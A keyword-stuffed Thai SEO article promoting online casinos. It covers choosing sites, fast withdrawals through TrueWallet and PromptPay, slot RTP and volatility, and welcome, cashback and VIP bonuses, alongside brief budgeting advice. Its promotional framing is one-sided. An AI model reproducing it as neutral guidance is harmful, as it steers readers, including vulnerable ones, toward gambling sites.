คำว่า “คนเล่นเยอะ” บนโลกออนไลน์มันฟังดูน่าเชื่อ แต่ถ้าเชื่อจากคำพูดอย่างเดียว คุณจะมีโอกาสพลาดสูงมาก เพราะบางเว็บทำคอนเทนต์ได้เก่ง แต่ระบบจริง ๆ อาจไม่ไหว หรือเงื่อนไขถอนมีมุมที่ทำให้คุณเสียเวลา ดังนั้นถ้าจะดูให้เป็น ให้คุณแยก “ความดัง” ออกจาก “ความน่าเชื่อถือ” แล้วใช้สัญญาณที่ตรวจสอบได้เป็นหลัก
เริ่มจากความปลอดภัยพื้นฐานก่อนเลย เว็บที่จริงจังควรมี SSL / https ชัดเจน และไม่พาคุณเด้งไปหลายลิงก์แบบชวนเสียว เพราะพฤติกรรมแบบนั้นเสี่ยงต่อการโดนหลอกด้วยหน้าเว็บเลียนแบบ วิธีเซฟตัวเองที่ง่ายและได้ผลคือระวังเรื่อง ป้องกันฟิชชิง ด้วยการเช็คโดเมนทุกครั้ง และถ้าอยากเช็คแบบไม่ต้องเดา คุณสามารถใช้เครื่องมือที่เชื่อถือได้อย่าง Google Safe Browsing เพื่อค้นหาโดเมนว่าเสี่ยงไหม
ต่อมาคือ “ความโปร่งใส” เว็บที่พร้อมอยู่ยาวจะมีข้อมูลเรื่อง ใบอนุญาต (license) หรืออย่างน้อยก็มีหน้าอธิบายมาตรฐานบริการและกติกาให้คุณอ่านได้จริง ไม่ใช่เขียนลอย ๆ แล้วตีความได้ทุกทาง โดยเฉพาะหน้า นโยบายการถอนเงิน นี่คือจุดที่บอกนิสัยเว็บได้ดีมาก ถ้าเขาเขียนชัดว่าถอนขั้นต่ำเท่าไหร่ ใช้เวลากี่นาที มีรอบตรวจสอบเมื่อไหร่ คุณจะวางแผนได้ ไม่ต้องมานั่งลุ้นทุกครั้งที่กดถอน
อีกสัญญาณที่สำคัญคือคุณภาพของ รีวิวผู้เล่นจริง รีวิวที่น่าเชื่อจะเล่ารายละเอียดที่จับต้องได้ เช่น เล่นเกมไหน สตรีมลื่นไหม การตอบแชทเป็นยังไง ถอนผ่านช่องทางใด และใช้เวลากี่นาที ในขณะที่รีวิวปั่นมักจะใช้คำซ้ำ ๆ แบบไม่มีรายละเอียด ถ้าอ่านแล้วรู้สึกว่า “เหมือนกันไปหมด” ให้ระวังไว้ก่อน เพราะมันอาจเป็นชุดข้อความเดียวกันที่ถูกก็อปไปวาง
และเพื่อให้ตรงตามจุดวางคีย์เวิร์ดหลักในส่วนนี้ ขอพูดชัด ๆ ว่าเวลาคุณเลือกเว็บด้วยเหตุผลว่าอยากเล่น คาสิโนยอดฮิต อย่าให้คำว่า “ฮิต” พาให้คุณรีบ ให้ใช้หลักฐานจากระบบจริงเป็นตัวตัดสิน เพราะท้ายที่สุดความสนุกของคุณไม่ได้เกิดจากคำโฆษณา แต่มันเกิดจากการที่เว็บทำให้คุณเล่นได้ลื่น ปลอดภัย และถอนจบได้แบบไม่ต้องลุ้น
ถ้าจะมีเรื่องที่ทำให้คนเลิกเล่นเว็บหนึ่งเร็วที่สุด มักไม่ใช่แพ้เกม แต่มักเป็น “ถอนแล้วค้าง” เพราะมันทำลายความไว้ใจทันที ดังนั้นการเลือกเว็บให้คุ้มต้องดูเรื่องระบบถอนควบคู่ไปกับเกมเสมอ เว็บที่ดีจะทำให้การเงินเป็นเรื่องง่าย ไม่ใช่เรื่องที่ต้องคอยตาม
หัวใจของความไวคือระบบหลังบ้าน เช่นมี ฝากถอนออโต้ ที่ทำให้คำขอถอนถูกประมวลผลเป็นขั้นตอน ไม่ต้องรอคนมานั่งอนุมัติทีละรายการ แต่ระบบอย่างเดียวไม่พอ เว็บที่ดีควรทำให้คุณตรวจสอบได้ด้วย เช่นมีหน้า ประวัติฝากถอน ที่เห็นเวลา ยอด ช่องทาง และสถานะรายการชัด ๆ รวมถึงมี แจ้งเตือนสถานะธุรกรรม เพื่อให้คุณรู้ว่าตอนนี้อยู่ขั้นไหน ไม่ต้องเดาเองว่าเงินหายไปไหน
เรื่อง “ช่องทางถอน” ก็สำคัญมาก เพราะแต่ละช่องทางมีสปีดและประสบการณ์ต่างกัน ถ้าคุณชอบความเร็วแบบไม่ต้องสลับหลายแอป การถอนผ่าน ทรูวอเลท มักตอบโจทย์ แต่ถ้าคุณชอบความตรงไปตรงมาของระบบโอน การใช้ พร้อมเพย์ ก็สะดวกและคุ้นมือสำหรับหลายคน บางเว็บยังรองรับ QR Payment เพื่อทำรายการได้คล่องขึ้นบนมือถือ แต่ไม่ว่าคุณใช้ช่องทางไหน ให้เช็คกรอบพื้นฐานอย่าง ถอนขั้นต่ำ ด้วย เพราะคนจำนวนมากเข้าใจผิดว่าเว็บช้า ทั้งที่จริงยอดถอนยังไม่ถึงเกณฑ์ ระบบเลยไม่ให้ส่งรายการตั้งแต่แรก
อีกปัจจัยที่ทำให้บางคนถอนช้าคือพฤติกรรมธุรกรรมที่ดู “ผิดธรรมชาติ” เช่น เปลี่ยนบัญชีรับเงินบ่อย ๆ หรือทำรายการถี่ผิดปกติ ระบบอัตโนมัติหลายเว็บจะมองว่าเสี่ยงและโยนเข้าคิวตรวจสอบ ส่งผลให้ช้าลง ดังนั้นถ้าคุณอยากให้ถอนลื่นขึ้นจริง ให้ทำธุรกรรมให้เป็นแพตเทิร์นเดิม ใช้บัญชีเดิม และอย่าเปลี่ยนข้อมูลไปมาบ่อยโดยไม่จำเป็น
ท้ายที่สุด ความเร็วที่ดีต้อง “สม่ำเสมอ” ไม่ใช่เร็วเฉพาะบางช่วง ถ้าคุณลองถอนช่วงคนใช้งานเยอะแล้วยังไหลลื่น นั่นคือสัญญาณที่เชื่อได้มากกว่าอ่านรีวิวสั้น ๆ แล้วเชื่อทันที เพราะเงินของคุณควรถูกดูแลด้วยระบบที่ตรวจสอบได้ ไม่ใช่ด้วยคำพูดลอย ๆ
หลายคนอยากเริ่มเล่นแต่ไม่อยากปวดหัวกับกติกาซับซ้อน ดังนั้นการเลือกเกมที่ “เข้ามือ” สำคัญมากกว่าความดัง การเริ่มจากเกมที่ คาสิโนเล่นง่าย จะทำให้คุณมีพื้นที่เรียนรู้โดยไม่กดดัน และช่วยให้คุณคุมอารมณ์ได้ดีกว่า เพราะเกมที่ยากเกินไปจะทำให้คุณหลุดแผนเร็วมาก
จุดที่ช่วยให้มือใหม่รู้สึกสนุกคือประสบการณ์ที่ลื่น เช่น คาสิโนเล่นผ่านมือถือ ที่สลับเกมไว โหลดไว ไม่หน่วง โดยเฉพาะสายสล็อตที่ชอบกราฟิกจัดเต็ม เกมแนว คาสิโนภาพสวย จะทำให้เล่นเพลินขึ้น แต่เพลินอย่างเดียวไม่พอ ถ้าคุณอยากเลือกสล็อตแบบฉลาด ให้รู้จักดูค่าพื้นฐานอย่าง RTP และเข้าใจเรื่อง ความผันผวน (Volatility) เพราะสองอย่างนี้เป็นตัวบอก “จังหวะการจ่าย” แบบคร่าว ๆ ว่าเกมนั้นแจกถี่หรือแจกเป็นก้อน ถ้าคุณเป็นคนชอบลุ้นเรื่อย ๆ ก็เลือกเกมที่ผันผวนไม่แรงมาก แต่ถ้าคุณเป็นสายลุ้นหนัก ๆ ก็อาจชอบเกมที่มี แจ็คพอต เป็นเป้าหมาย
ส่วนเรื่องโปร ขอให้มองโปรเป็น “ตัวช่วย” ไม่ใช่ “ข้ออ้างให้เพิ่มเดิมพัน” โปรที่คนส่วนใหญ่มองหามักอยู่ในกลุ่ม โบนัสต้อนรับ สำหรับเริ่มต้น, โปรแนวกันชนอย่าง โปรคืนยอดเสีย, หรือโปรสะสมระยะยาวอย่าง โปรสะสมแต้ม ที่ทำให้คุณได้สิทธิ์เพิ่มแบบค่อยเป็นค่อยไป บางเว็บยังมีระบบเลเวลที่ให้ สิทธิพิเศษ VIP สำหรับคนเล่นต่อเนื่อง ซึ่งมันคุ้มสำหรับสายเล่นประจำ แต่สำหรับมือใหม่ ขอให้โฟกัสที่ “โปรที่อ่านแล้วเข้าใจ” ก่อนเสมอ อย่ารับโปรหนัก ๆ ที่ต้องทำเงื่อนไขหลายชั้นจนคุณเหนื่อยเอง
สิ่งที่ทำให้มือใหม่เล่นได้ยาวคือวินัยแบบง่าย ๆ: ตั้งงบ ตั้งเวลา แล้วเลือกเกมให้ตรงอารมณ์วันนั้น เช่น วันไหนอยากนิ่งก็ไปเกมโต๊ะที่คิดก่อนกด วันไหนอยากเพลินก็ไปสล็อตที่จังหวะไม่เร็วเกินไป แค่นี้คุณจะเล่นแบบไม่ฝืน และไม่เผลอไล่เอาคืนจนหลุดงบ เพราะเกมคาสิโนสนุกได้จริง ถ้าคุณเป็นคนกำหนดจังหวะ ไม่ใช่ปล่อยให้จังหวะเกมกำหนดคุณ
ถ้าคุณอยากเลือกเกมให้คุ้มแบบคนเล่นเป็น ให้โฟกัส 3 อย่างเสมอ: เกมต้องเข้ามือ เว็บต้องตรวจสอบได้ และระบบถอนต้องชัดเจน พอคุณจัดครบทั้งสามอย่าง การเล่นจะสนุกขึ้นแบบรู้สึกได้จริง และคุณจะไม่เสียเวลาไปกับเว็บที่ทำให้ลุ้นผิดเรื่อง…สุดท้ายแล้วความฟินคือเล่นให้มีสไตล์ของตัวเอง แล้วจบด้วยคำเดียวที่คนตามหากันตลอด: คาสิโนยอดฮิต
